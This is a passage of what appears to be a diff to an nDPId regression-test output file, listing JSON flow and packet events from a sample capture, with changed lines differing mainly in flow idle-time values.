2EtV17fJf9FTeneF2Mqb71b7Sm6WLVC5O5MxtNRFe86f6Z1f1L29jwXXUVhj"} +02168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2552,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":3,"flow_last_seen":1467353202192,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353202192,"pkt":"ABxCjnAxTF4M6gNlCABFKAUUuCxAADIG4NFN6ikjwKhzCABQwBY\/zywDxn1A6VAQAALrNgAALT11Li5gWvs4BXi1xLjmvfKMj0peVQo7lKJXGpIXNwaIVVnV50PDXh\/nhoec299vHndpLUua\/bqpCOjp7McAoWKOkJJNwfqArWbPME9b6btDGVgV0uzbgys3HrUPZGuULZqVvC9cfPh7y1VrCRATr2jIquLGEs7NUuTFUS2\/94Q2D+b6OEydZRO9cPMEkga3a+5FSfXnzkWP45N4tdwDAY3rKF71DNh9qyHNw3zq0kfntg59U62XHN6AJpW5oqhpNP\/KXicl+wTn90pd\/Ux5pxaNuaTtiVisjsDdqJGttkpWFmkIvcN4O3H7Nh+g88QCys9WSrOYR9T1WklqZUIXO2KozevHqrDRk3FhsvxtYk4AY5OTxXPHL2qjoy\/5\/LCO7z9Q0I1UDJ6H3s55a0u\/YyMnFnPMluUDID6DqRJHSb6OUS7lT\/EU7rwQMeL0oaEabUBfFS+XanJaGDL1BZSIyNomFf0DPsUe3djOS8nPpXOhOL\/zzo0NjXvFjylWLV5uSrIEQBYM8WUnB+X2Q2Wcez+wiFByuVMleIMfXAFk2nK\/2ntwKLyC0FBADi6XZL3qNrjHMTQHSC+dvnacGjv84sTgyPra7k8ik3DBtc1vCpiDd8xq36vyCP\/Ys2QYll2fN6Xbf+94Si8B0K0uar09Ty6DviDBYXt5\/8XpJtEJWzUaGUBbbCEtHIzhk3G2p2itRnzSyt10DUes\/e9jLtGO\/lchukfEfGu5+Y3TxFhX7Hv333wv7QEFPFBprU3t6V4dIS250PFtx3UWkJ\/KX1vB3GhaMaxBrDbzvjhV2WKQ\/Nnv8ZBY9VdRfkCLJV\/HblSMFcUwHxo4IG2hrHP6TmVmYZ8nIHO7sPEv51L3RYhnBGODsvT6Nl8\/uUNtzAC0mRAznmk7IsUW9cl71zuY0pjDL21g4bID6MrMuZm1Md9NHvU392TiT0doM\/mcbpr5kwNIJ4xpVq6TbrnGRECU65QT+3b\/mxQ15tdSgLRxavOq35PnNQqYK5ZOBDF9u2L\/jTZsE\/v5\/BjNF7aLpx8Nx9Ddl+8avs92OeLW3xatFRgatYsqSPdDSCWt\/7DKoHeOQNGej+4sPaab2IT40o+lWkNrHHFVKhXd8C8SlbnU3Y75R26q+3sGFS+RyE6QyJ\/9EgUPSerMv2RjAJ0haqzfaWTRZ1ZgTOEuLBSeWyw\/5ab4eQDQi0DSVpRkK9n7z6c0f+4O2vunGdSrnv5FBBQxLbrd8yHz3RejyafRygtcHHU3GotYO\/8AGow33n2mzZuLfvvluwSNjTr7s9+t1mvnBDTAJ\/w70fY1Tmwt8AmO+R4XaV\/P8kj5BSwxsIQ6s44lL2edfFiPzVM2v9TOk+F5lYNtoawNgI43Hns0wnw00qQhKTaOTYk+\/7rXY0Dy57cX2LbiFl0dMrMNwkSmzc5OOQEillNkcjpMP\/us+nfs+bmsUceWf2FdKzv2OlHy5srMsxLZZ64aGceMbX4ACl2x0Ow5nsH0a2jCfohcp78SJIn9dHE3evNd2nn4FwNTdYtr8pjqtj6OYulAm5wuv5my4xx1pmVWIbK7w519BlDX6tBN7SDWo4cCZLo7HGPFpXlKMdV6PWa68yPUlNYrLHFOnDpF5xk8sJqNdF2omWAwtrP65WUrU3KZ8D62RRrQfwB0KLK2eRd5P3m9hXVnQ6Nq"} 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.26.193.119","src_port":22793,"dst_port":7133,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.26.193.119","src_port":22793,"dst_port":7133,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1467353151975,"flow_last_seen":1467353165019,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":24650,"flow_avg_l4_payload_len":1071,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"77.234.40.96","src_port":50486,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Cybersec","breed":"Safe","category":"Cybersecurity"}} +00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1467353151975,"flow_last_seen":1467353165019,"flow_idle_time":7560000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":24650,"flow_avg_l4_payload_len":1071,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"77.234.40.96","src_port":50486,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Cybersec","breed":"Safe","category":"Cybersecurity"}} 00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136835,"flow_last_seen":1467353136835,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"115.157.62.243","src_port":22793,"dst_port":29006,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136835,"flow_last_seen":1467353136835,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"115.157.62.243","src_port":22793,"dst_port":29006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136833,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.250.102.66","src_port":22793,"dst_port":1107,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136833,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.250.102.66","src_port":22793,"dst_port":1107,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353136757,"flow_last_seen":1467353136757,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65125,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353136757,"flow_last_seen":1467353136757,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65125,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353159222,"flow_last_seen":1467353159428,"flow_idle_time":7440000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":581,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65127,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353181295,"flow_last_seen":1467353181515,"flow_idle_time":7440000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":589,"flow_avg_l4_payload_len":294,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65128,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353136757,"flow_last_seen":1467353136757,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65125,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353136757,"flow_last_seen":1467353136757,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65125,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353159222,"flow_last_seen":1467353159428,"flow_idle_time":7560000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":581,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65127,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353181295,"flow_last_seen":1467353181515,"flow_idle_time":7560000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":589,"flow_avg_l4_payload_len":294,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65128,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136835,"flow_last_seen":1467353136835,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.26.74.190","src_port":22793,"dst_port":1037,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136835,"flow_last_seen":1467353136835,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.26.74.190","src_port":22793,"dst_port":1037,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136835,"flow_last_seen":1467353136835,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"210.44.232.243","src_port":22793,"dst_port":21044,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136835,"flow_last_seen":1467353136835,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"210.44.232.243","src_port":22793,"dst_port":21044,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1467353136835,"flow_last_seen":1467353136836,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"1.169.136.116","src_port":22793,"dst_port":17951,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1467353136835,"flow_last_seen":1467353136836,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"1.169.136.116","src_port":22793,"dst_port":17951,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139305,"flow_last_seen":1467353139309,"flow_idle_time":7440000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":759,"flow_tot_l4_payload_len":985,"flow_avg_l4_payload_len":492,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.24","src_port":50466,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139305,"flow_last_seen":1467353139309,"flow_idle_time":7560000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":759,"flow_tot_l4_payload_len":985,"flow_avg_l4_payload_len":492,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.24","src_port":50466,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} 00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136838,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"220.130.154.23","src_port":22793,"dst_port":35941,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136838,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"220.130.154.23","src_port":22793,"dst_port":35941,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1467353152692,"flow_last_seen":1467353167734,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":798,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":59648,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353156641,"flow_last_seen":1467353156700,"flow_idle_time":7440000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2184,"flow_avg_l4_payload_len":728,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50488,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1467353157138,"flow_last_seen":1467353157157,"flow_idle_time":7440000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":32840,"flow_avg_l4_payload_len":1216,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50491,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353157509,"flow_last_seen":1467353159746,"flow_idle_time":7440000,"flow_min_l4_payload_len":376,"flow_max_l4_payload_len":403,"flow_tot_l4_payload_len":1168,"flow_avg_l4_payload_len":389,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50494,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":246,"flow_first_seen":1467353189325,"flow_last_seen":1467353189439,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":306749,"flow_avg_l4_payload_len":1246,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50505,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353190040,"flow_last_seen":1467353190044,"flow_idle_time":7440000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":1009,"flow_tot_l4_payload_len":1167,"flow_avg_l4_payload_len":583,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50507,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353190634,"flow_last_seen":1467353190638,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":366,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353156641,"flow_last_seen":1467353156700,"flow_idle_time":7560000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2184,"flow_avg_l4_payload_len":728,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50488,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1467353157138,"flow_last_seen":1467353157157,"flow_idle_time":7560000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":32840,"flow_avg_l4_payload_len":1216,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50491,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353157509,"flow_last_seen":1467353159746,"flow_idle_time":7560000,"flow_min_l4_payload_len":376,"flow_max_l4_payload_len":403,"flow_tot_l4_payload_len":1168,"flow_avg_l4_payload_len":389,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50494,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":246,"flow_first_seen":1467353189325,"flow_last_seen":1467353189439,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":306749,"flow_avg_l4_payload_len":1246,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50505,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 